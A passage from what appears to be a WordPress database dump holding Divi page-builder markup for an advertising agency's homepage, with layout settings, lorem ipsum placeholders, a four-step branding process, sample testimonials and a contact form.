custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-Copy-12.png\" alt=\"digital advertising\" title_text=\"digital advertising\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 20:51:57','2020-08-06 20:51:57','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(446,1,'2020-08-06 20:54:15','2020-08-06 20:54:15','Advertising agency in delhi','Advertising agency in delhi','','inherit','open','closed','','artboard-copy-12-2','','','2020-08-07 16:39:32','2020-08-07 16:39:32','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png',0,'attachment','image/png',0),(447,1,'2020-08-06 20:54:49','2020-08-06 20:54:49','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" 